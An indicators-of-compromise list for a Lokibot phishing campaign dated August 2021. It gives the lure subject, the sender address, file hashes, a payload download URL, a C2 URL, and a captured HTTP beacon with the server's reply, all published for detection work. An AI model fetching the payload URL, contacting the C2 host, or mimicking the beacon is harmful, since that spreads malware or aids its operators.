2021-08-09 Lokibot IOCs

1. THREAT IDENTIFICATION: LOKIBOT
2.  
3. SUBJECTS OBSERVED
4. purchase order 090821
5.  
6. SENDERS OBSERVED
7. exports@zwpcompany.com
8.  
9. MALDOC FILE HASHES
10. purchase order 090821.xlsx
11. 97f66886c8ed99dff7103f9057076693
12.  
13. LOKIBOT PAYLOAD URLS
14. http://klipotrim.com/cjnewa/cjuyro.exe
15.  
16. LOKIBOT PAYLOAD FILE HASHES
17. 97071E.exe
18. 09a33d0fb401a5ab4a5250a799a6689f
19.  
20. UNKNOWN FILE HASH
21. 97071E.hdb
22. fb527ebc3cd84eb70acb6d6d1ddcc819
23.  
24. LOKIBOT C2
25. http://arkt.xyz/mrtker4/w2/fre.php
26.  
27. C2 PACKET CONTENTS
28. POST /mrtker4/w2/fre.php HTTP/1.0
29. User-Agent: Mozilla/4.08 (Charon; Inferno)
30. Host: arkt.xyz
31. Accept: */*
32. Content-Type: application/octet-stream
33. Content-Encoding: binary
34. Content-Key: A1795E60
35. Content-Length: 3443
36. Connection: close
37.  
38. HTTP/1.1 404 Not Found
39. Date: Mon, 09 Aug 2021 16:30:42 GMT
40. Content-Type: text/html; charset=UTF-8
41. Connection: close
42. Status: 404 Not Found
43. CF-Cache-Status: DYNAMIC
44. Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H17TLh4lp8XYZKhy8z2n4Pt9JIY1xoklPWc0GGO21wgL07%2FkumjZh899YK5p%2B67jj5U56uX21OyW8OqqXycebjjvSTcYVbr6SDt6CVtq31HSkxbn0pVZ1CeJBw%3D%3D"}],"group":"cf-nel","max_age":604800}
45. NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
46. Server: cloudflare
47. CF-RAY: 67c25ed7dadfe6bc-EWR
48. alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
49.  
50. File not found.